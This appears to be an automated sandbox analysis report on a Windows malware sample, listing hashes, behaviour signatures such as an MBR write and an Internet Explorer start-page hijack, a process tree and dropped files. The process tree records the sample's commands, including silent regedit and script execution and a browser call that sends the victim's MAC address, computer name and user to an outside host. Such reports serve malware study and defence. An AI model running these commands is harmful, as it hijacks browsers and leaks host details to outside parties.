Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    25-06-2024 08:39

General

  • Target

    0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe

  • Size

    895KB

  • MD5

    0d68d0b728c15702de28772dadc20f09

  • SHA1

    52e64a2204b7c694c51c77cf906b460da3464503

  • SHA256

    166d04f845fc5460233eb6f7b0510a69ff2d90bd6ae8062453097d4878c3b97b

  • SHA512

    012461fef1360d50343b4baf3c70391a9fa63b1f5af4f12cb6c865c20d0bdf4748316654dc21aa950ac39649522f5142a1016cb9aac17616ecab77f4c951dc22

  • SSDEEP

    12288:dZjMLf11MmPQeRXEHYYS3gA0FJO1t3r6QJ3LdXWcmfnGA2feMe3JZJ7kASbla:dafIiy4NwdLpQJZXWgcpJZJAVa

Malware Config

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\baidu.exe
      C:\baidu.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Program Files\Common Files\tk.reg"
          4⤵
          • Modifies registry class
          • Runs .reg file with regedit
          PID:2432
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd.exe /c CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_shfnlpbag.qbhxe" >> "C:\Program Files\shfnlpbag.qbhxe"
        3⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\cscript.exe
          CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_shfnlpbag.qbhxe"
          4⤵
            PID:2808
        • C:\Windows\SysWow64\WScript.exe
          "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\shfnlpbag.qbhxe"
          3⤵
          • Modifies visiblity of hidden/system files in Explorer
          • Modifies Internet Explorer settings
          • Modifies Internet Explorer start page
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.54600.com/?byme
            4⤵
              PID:1852
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=66:A5:A0:AB:38:8F&a_cpname=PUMARTNR&a_user=byme&a_locip=0.0.0.0
            3⤵
              PID:1340
            • \??\c:\windows\SysWOW64\wscript.exe
              c:\windows\system32\wscript.exe C:\\Killme.vbs
              3⤵
                PID:1136
            • C:\SeFastInstall2_3214.exe
              C:\SeFastInstall2_3214.exe
              2⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetWindowsHookEx
              PID:2700
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://www.1234.la/an.htm?qqchang
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2160
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:2
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3068
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:406533 /prefetch:2
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2488
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275474 /prefetch:2
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2348

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Killme.vbs

            Filesize

            218B

            MD5

            0639fba03ab54443ada1891bd2e2c7b3

            SHA1

            ab688409e35f4b7aeba68eaf83fa10fbcb590cd2

            SHA256

            6620568a36d6a0d43cd64933c87dc362cb950bc0f0e71b7e8b3244ec243c2aad

            SHA512

            697b7b2301bc00b31ef8ebc0f9917a0d80a9caffb1a3f5c87726c8c0297b991e2c4711e11d8bbab59586958d8f577b035cd97e7406f804b959eeea28db360acc

          • C:\Program Files\1_shfnlpbag.qbhxe

            Filesize

            48KB

            MD5

            7cd98f76cdd082fcfb184c5ba13e8924

            SHA1

            2132ca945b5eee11086a4afb75bb2a519f372928

            SHA256

            0ca3c6e9120abcb1fba6caed17338c3be7e96cfab493599c4d70801a3d06fe11

            SHA512

            f66711fd326d475874982471bdfa71ceeede9f08a81f9cc4471ee625638669bdad548501cf16e15e65f52f7f3f21890c1d7cd8378acdfa0544867209c5df7fb3

          • C:\Program Files\Common Files\tk.reg

            Filesize

            2KB

            MD5

            2642e9ec1a2da48dc43e758e78578792

            SHA1

            6efc1df849ddace7b9b39d5b759b3ae6239c5c71

            SHA256

            4c87ff7a1aa997628668acabfd90366f771644fed84286dbaa1089873ecd3ca8

            SHA512

            2befd851400c6192f05ac51726130d4cb200cacbdec26f50369e2254e70f39c1922f7ad789234fbdf15046534505778f8d2fab74e92e114b69bb5c27fadd04bc

          • C:\Program Files\pack.wsf

            Filesize

            8KB

            MD5

            a83fdf4f29a7e978d33eeb3674df531b

            SHA1

            60ea7b41816bc2044a6224e38352e56667d3d5ed

            SHA256

            f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

            SHA512

            7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

          • C:\Program Files\shfnlpbag.qbhxe

            Filesize

            37KB

            MD5

            3b3f4be3a987f052b40151a2361fba10

            SHA1

            5788ef644f22b884d0adcd12f8d9e1323abbb253

            SHA256

            243ba818230b31c2de80aee4e8e3920573a4eaeb67e3b8814faa06d814830d0e

            SHA512

            e0c5103802e58d4f17cf96ba7b7eb32032de678afb58b29beccfebc559b9a0b458ce76f6cd4faeb96855b9fd5ccf8755f0d375d7f8b3a67dfe4e2b23493efa3b

          • C:\SeFastInstall2_3214.exe

            Filesize

            260KB

            MD5

            0dd90d39ffe81cdb5f76ce43972279aa

            SHA1

            d267f9a3952111406d93ec923ea9e1042a5105f1

            SHA256

            ede8e12b03f88ce44ae189c905a2885f76129d9141e17878a3ab2fbc4464e4a9

            SHA512

            cb56bb73cc6e659a668a24bdeb4b5ce48857fc4e7eefd6c92713bc0606fea550ac23f6c6c1fda8eff7622924a4425fc1a40dc4fb36f9657d88f232a51034994f

          • C:\Windows\My.ini

            Filesize

            96B

            MD5

            9880e4958e78bd3689bb2a2f88769cf8

            SHA1

            e674d6683a5ee1cdc077bd858b384adb34b65070

            SHA256

            b3d51088833add096bdfb1ee934b2f049cb74734bc2a3a927143d6b328d12e29

            SHA512

            cf3358cbcca7d863b994c8e5072c83b3fcbba6410fe8bb405a7ecac99f4e4105994aae277ca802f6839a780a374d09ff9596414d39abfc4a7f3cb83e2453a2e7

          • C:\Windows\My.ini

            Filesize

            301B

            MD5

            64ffd48ac22e0d4ab15584781a08ed9e

            SHA1

            9ce677319f0a56011c3264936b6288e606758496

            SHA256

            a7ea55af6cc9231de18e8b18b4b075e485016140ecdd2002292227c735e56054

            SHA512

            f65082fc47d344e557130bf16033280a658b42f375f6f6c766e27f2dafb94ba6bfc6fcbfc02ec06f984a7f69c94a26196baba870a66a0fec358646762f84a581

          • C:\baidu.exe

            Filesize

            31KB

            MD5

            b507fe74c0156298e106e287c10b6fd1

            SHA1

            05fa8f5c6fecad42919fd5f046d3f339ceb49413

            SHA256

            a31fff380a15a2ffe0cb95174982d7f13b369396e1477dfe75f133d9b643b4ab

            SHA512

            c17cc3dccf71c05b042bba12370fd506ddcf82dcd41a23c147301c67041b2af555bf3613500b16d60ecc4cdcc57de37cca9cc425042f1a494b313588e32a883f

          • \??\c:\about blank.htm

            Filesize

            77B

            MD5

            cb2c712ef5520c3bc139c39fbee6ca86

            SHA1

            8a0b9c5fd8ee7a721ff82071396d8aecc948dfcf

            SHA256

            5fb3e9d4a2293f083e6ab2873471457e1035fa30c8cd63dff502cfde4e60f92f

            SHA512

            fa660297ab5bff57f2a54065c6e42ddc149420a6450efb10cd9a91d4aea46d1b8745e88193482b43f2467cd6a9c22759cfb441b55e41424058ef99bbdc98c60c

          • memory/836-17-0x0000000000E10000-0x0000000000E39000-memory.dmp

            Filesize

            164KB

          • memory/836-18-0x0000000000E10000-0x0000000000E39000-memory.dmp

            Filesize

            164KB

          • memory/836-21-0x00000000027D0000-0x00000000028CC000-memory.dmp

            Filesize

            1008KB

          • memory/2396-54-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/2396-19-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/2396-60-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/2700-23-0x0000000000400000-0x00000000004FC000-memory.dmp

            Filesize

            1008KB

          • memory/2700-55-0x0000000000400000-0x00000000004FC000-memory.dmp

            Filesize

            1008KB

          • memory/2700-56-0x0000000000400000-0x00000000004FC000-memory.dmp

            Filesize

            1008KB